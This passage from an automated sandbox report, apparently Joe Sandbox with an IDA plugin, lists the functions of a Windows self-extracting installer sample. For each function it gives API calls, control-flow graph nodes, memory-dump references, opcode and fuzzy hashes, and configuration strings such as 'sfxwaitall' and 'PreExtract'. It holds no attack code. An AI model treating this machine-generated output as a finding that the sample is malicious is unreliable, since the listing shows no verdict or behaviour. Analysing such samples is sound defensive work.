                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Find$??2@CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 4002974997-0
                                                                                • Opcode ID: 688b43709c11a5a7d08100325d9734e530e7c46e220bc9de0b863d14d6a0dd3f
                                                                                • Instruction ID: 793d1416ce16d4dbbc7bac0da152af532d808b73086aa34ee1095b61dd29bce3
                                                                                • Opcode Fuzzy Hash: 688b43709c11a5a7d08100325d9734e530e7c46e220bc9de0b863d14d6a0dd3f
                                                                                • Instruction Fuzzy Hash: 2A110631700111ABCB20AF24DC08AAF77A4AF45714F00443AFC46EB2D1D738DC428FA9
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(0040682B,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041E7B8,0040682B), ref: 00404021
                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00404033
                                                                                • FreeSid.ADVAPI32(00000000), ref: 0040403C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
                                                                                • Instruction ID: 897e3d853c979f7ca1e9d36a2150445fe5287065c6dcae09f62a90d6d31b286d
                                                                                • Opcode Fuzzy Hash: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
                                                                                • Instruction Fuzzy Hash: 35F0DAB5900208FBDB00DFD5DD89ADEBBBCFB08344F504469A605E2191D3709A149B15
                                                                                APIs
                                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00402462
                                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 004024BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: DiskFreeMessageSendSpace
                                                                                • String ID:
                                                                                • API String ID: 696007252-0
                                                                                • Opcode ID: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
                                                                                • Instruction ID: 8208958cd5f058e564b84d0c2d53d4d01197a59289713be1c569bcd397771c57
                                                                                • Opcode Fuzzy Hash: ab9cdcdd9b55208fec138a9dead6acff31393ca49536454abc1c7d8bd56cf985
                                                                                • Instruction Fuzzy Hash: EA014B34610204BAEB149B65DE4DF9A3BA9FB01724F108476F901EA1E0DABAE940CB1D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 516 40206f-4020a2 call 411b60 call 40433d call 40562e 523 4020a4-4020b3 call 404139 516->523 526 4020b5-4020bb 523->526 527 4020bd-4020cc call 404139 523->527 526->523 530 4020d6-4020e5 call 404139 527->530 531 4020ce-4020d4 527->531 534 4020f3-402102 call 404139 530->534 535 4020e7-4020ef 530->535 531->523 540 402104 534->540 541 40210f-402121 call 404139 534->541 535->523 536 4020f1 535->536 538 402106-40210d 536->538 538->523 540->538 544 402143-402153 call 404139 541->544 545 402123-40212a 541->545 550 402155-402165 call 404139 544->550 551 402167-402169 544->551 547 40213c-40213e 545->547 548 40212c-402137 _wtol 545->548 547->523 548->547 550->551 554 40216e-402177 call 4041be 550->554 551->523 557 402187-402190 call 404226 554->557 558 402179-402182 554->558 561 4021a0-4021ab 557->561 562 402192-40219b 557->562 558->523 563 4021f4-4021f7 call 411c48 561->563 564 4021ad-4021b1 561->564 562->523 568 4021fc-402200 call 411ca3 563->568 566 4021b3-4021cb call 411be5 call 411ca3 * 2 564->566 567 4021cd-4021ce call 411be5 564->567 573 4021d3-4021e3 call 405041 566->573 567->573 574 402205-40222f call 411b60 call 40310a call 411b84 call 40562e 568->574 573->574 582 4021e5-4021f2 call 411ca3 573->582 592 402235-40223f call 401c91 574->592 593 4022f9-4022fc 574->593 582->568 592->593 598 402245-40224b 592->598 594 402332-40235b ??3@YAXPAX@Z * 2 call 4030b1 ??3@YAXPAX@Z 593->594 600 402260-40226b call 40562e 598->600 601 40224d-402256 call 411ca3 598->601 607 4022e2-4022f2 call 401dca 600->607 608 40226d-4022c6 call 411b32 call 411b08 call 411aec call 411b84 ??3@YAXPAX@Z * 3 call 401cc0 600->608 606 40225b-40225e 601->606 606->600 609 402258 606->609 614 4022f4 call 401c35 607->614 615 4022fe-4022ff SetLastError 607->615 632 4022cb-4022d0 608->632 609->606 614->593 618 402305-40230c 615->618 620 40231b-402327 call 40976c 618->620 621 40230e-402319 GetLastError 618->621 624 40232a-402331 call 405b62 620->624 621->620 621->624 624->594 633 4022d2-4022d8 ??3@YAXPAX@Z 632->633 634 4022da-4022e0 ??3@YAXPAX@Z 632->634 633->614 634->618
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0041E89C,?,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040435B
                                                                                  • Part of subcall function 0040433D: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00402095,00000000,0041E89C,?,00000000), ref: 0040436E
                                                                                • _wtol.MSVCRT ref: 00402130
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004022A5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000), ref: 004022AD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000), ref: 004022B5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041E89C,?,00000000), ref: 004022D2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041E89C,?,00000000), ref: 004022DA
                                                                                  • Part of subcall function 00401DCA: GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E98
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -), ref: 00401EA0
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?), ref: 00401EA8
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A), ref: 00401EB0
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000), ref: 00401EB8
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?), ref: 00401EC0
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?), ref: 00401EC8
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020), ref: 00401ED0
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?), ref: 00401ED8
                                                                                  • Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022), ref: 00401EE0
                                                                                  • Part of subcall function 00401DCA: GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3
                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 004022FF
                                                                                • GetLastError.KERNEL32(00000000,0041E89C,?,00000000), ref: 0040230E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 00402335
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 0040233D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 0040234F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$??2@$CurrentDirectoryErrorLast$CommandInfoLineStartup_wtol
                                                                                • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                                                                • API String ID: 3919891259-4019298132
                                                                                • Opcode ID: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
                                                                                • Instruction ID: bb106943ed3ca53a05403cb5435deaebd1a3063295b86531880bb6a0f43f7546
                                                                                • Opcode Fuzzy Hash: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
                                                                                • Instruction Fuzzy Hash: 2381C171E04115ABCB15BBA1D9595EE77B5AF40308F24403FE602772E1EABC1D82D78E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 739 4193af-419424 __set_app_type __p__fmode __p__commode call 41953b 742 419432-419489 call 419526 _initterm __getmainargs _initterm 739->742 743 419426-419431 __setusermatherr 739->743 746 4194c5-4194c8 742->746 747 41948b-419493 742->747 743->742 750 4194a2-4194a6 746->750 751 4194ca-4194ce 746->751 748 419495-419497 747->748 749 419499-41949c 747->749 748->747 748->749 749->750 752 41949e-41949f 749->752 753 4194a8-4194aa 750->753 754 4194ac-4194bd GetStartupInfoA 750->754 751->746 752->750 753->752 753->754 755 4194d0-4194d2 754->755 756 4194bf-4194c3 754->756 757 4194d3-419500 GetModuleHandleA call 407118 exit _XcptFilter 755->757 756->757
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                • String ID: tA
                                                                                • API String ID: 801014965-3672045730
                                                                                • Opcode ID: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
                                                                                • Instruction ID: 2bf29183f708790e43ece5c4b13c67657fe3397540b73bc69793bae2ed7e9e0f
                                                                                • Opcode Fuzzy Hash: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
                                                                                • Instruction Fuzzy Hash: 9D41AAB5D44308AFCB21DFA5DC55AEA7FB8EB09314F20412FE841A7291D7785C82CB59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 760 402d99-402dc1 call 401341 763 402dc3-402dc9 760->763 764 402dec-402df3 760->764 765 402dd7 763->765 766 402dcb-402dd1 763->766 767 402df5-402df7 call 404772 764->767 768 402e0a-402e14 ??2@YAPAXI@Z 764->768 772 402dd9-402de7 call 40976c 765->772 766->765 771 402dd3-402dd5 766->771 777 402dfc-402dfe 767->777 769 402e22 768->769 770 402e16-402e20 call 402671 768->770 775 402e25-402e4a call 402d2c * 2 769->775 770->775 771->772 784 403054 772->784 787 402e52-402e5e call 405041 775->787 788 402e4c-402e4f 775->788 777->768 781 402e00-402e05 777->781 782 403055-403059 781->782 784->782 791 402e60-402ea7 call 411b60 * 2 call 411be5 * 2 call 402963 ??3@YAXPAX@Z * 2 787->791 792 402ea8-402ed1 call 4011ca ??2@YAPAXI@Z 787->792 788->787 791->792 798 402ed7-402ef8 792->798 799 40302c-40303a 792->799 807 40301a-403026 call 4114aa 798->807 808 402efe-402f03 798->808 801 403049-403051 ??3@YAXPAX@Z 799->801 802 40303c-403041 call 40284e 799->802 801->784 809 403046 802->809 807->798 807->799 808->807 810 402f09-402f18 call 411b84 808->810 809->801 818 402f1c-402f29 call 405041 810->818 822 402f79-402f81 818->822 823 402f2b-402f55 call 411b84 call 41200b ??3@YAXPAX@Z 818->823 824 403011-403019 ??3@YAXPAX@Z 822->824 825 402f87-402f94 call 405041 822->825 836 402f73-402f77 823->836 837 402f57-402f63 call 402577 823->837 824->807 831 402fe6-402fea 825->831 832 402f96-402fbd call 411b84 call 41200b ??3@YAXPAX@Z 825->832 831->824 834 402fec-402ff8 call 4115b0 831->834 849 402fdb-402fe4 832->849 850 402fbf-402fcb call 402577 832->850 834->824 844 402ffa-403008 call 402577 834->844 836->818 836->822 846 402f65-402f6b 837->846 847 402f6c 837->847 844->824 853 40300a-403010 844->853 846->847 847->836 849->825 849->831 855 402fd4 850->855 856 402fcd-402fd3 850->856 853->824 855->849 856->855
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000048,PreExtract,0041AA3C,0041E868), ref: 00402E0C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0041ABB8,00000000,PreExtract,0041AA3C,0041E868), ref: 00402E99
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041ABB8,00000000,PreExtract,0041AA3C,0041E868), ref: 00402EA1
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,PreExtract,0041AA3C,0041E868), ref: 00402EC1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?), ref: 00402F4B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?), ref: 00402FB5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403014
                                                                                • ??3@YAXPAX@Z.MSVCRT(00406E3F,PreExtract,0041AA3C,0041E868), ref: 0040304C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@
                                                                                • String ID: ExtractMaskExclude$ExtractMaskInclude$PreExtract
                                                                                • API String ID: 4113381792-1386291556
                                                                                • Opcode ID: 65b864c0881956e057211817cab91c73a09b8b55b57162c10cc8b972a36fdcc9
                                                                                • Instruction ID: 7269ace4ee49ce545d33163e420a246a4dc032d25f4e3fe66d88e93700a2274f
                                                                                • Opcode Fuzzy Hash: 65b864c0881956e057211817cab91c73a09b8b55b57162c10cc8b972a36fdcc9
                                                                                • Instruction Fuzzy Hash: E1816B70E002099BDF14EFA2C955AEEBBB5AF44314F10406FE902BB2D1EB785D85CB49

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
                                                                                • CreateWindowExW.USER32(00000080,tooltips_class32,sfx,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403945
                                                                                • GetDesktopWindow.USER32 ref: 00403951
                                                                                • GetWindowRect.USER32(00000000), ref: 00403958
                                                                                • SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
                                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
                                                                                • DispatchMessageW.USER32(?), ref: 004039A3
                                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
                                                                                • String ID: sfx$tooltips_class32
                                                                                • API String ID: 3184818434-2224206080
                                                                                • Opcode ID: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
                                                                                • Instruction ID: bab660aaf1360166561ca95da768f7ace0d5693b3f23dfe4253bd0ab20d9046d
                                                                                • Opcode Fuzzy Hash: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
                                                                                • Instruction Fuzzy Hash: E411AC72902224BFCB109BB99C4CEEF3F7DEB49721F008020F605E2290CA749040CBBA

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 860 401cc0-401d0c call 411b60 * 2 memset 865 401d18-401d1b 860->865 866 401d0e-401d11 860->866 867 401d24-401d2a 865->867 868 401d1d 865->868 866->865 869 401d33-401d64 ShowWindow BringWindowToTop call 40310a call 411be5 867->869 870 401d2c 867->870 868->867 875 401d66-401d79 ??3@YAXPAX@Z * 2 869->875 876 401d7b-401d93 ShellExecuteExW 869->876 870->869 879 401dc2-401dc7 875->879 877 401db0-401dc0 ??3@YAXPAX@Z * 2 876->877 878 401d95-401d97 876->878 877->879 880 401da4-401daf CloseHandle 878->880 881 401d99-401d9e WaitForSingleObject 878->881 880->877 881->880
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • memset.MSVCRT ref: 00401CE6
                                                                                • ShowWindow.USER32(0002042C,00000005,?,0041A9F0,00000000), ref: 00401D3E
                                                                                • BringWindowToTop.USER32(?), ref: 00401D47
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041A9F0,00000000), ref: 00401D69
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041A9F0,00000000), ref: 00401D71
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00401D8B
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,0041A9F0,00000000), ref: 00401D9E
                                                                                • CloseHandle.KERNEL32(?,?,0041A9F0,00000000), ref: 00401DA7
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0041A9F0,00000000), ref: 00401DB3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041A9F0,00000000), ref: 00401DBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$Window$??2@BringCloseExecuteHandleObjectShellShowSingleWaitmemset
                                                                                • String ID:
                                                                                • API String ID: 1117119541-0
                                                                                • Opcode ID: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
                                                                                • Instruction ID: 93afddeaf3da2945c8596fa82df557d0c9d3bebd8f4b061b1b635e28d7e4d180
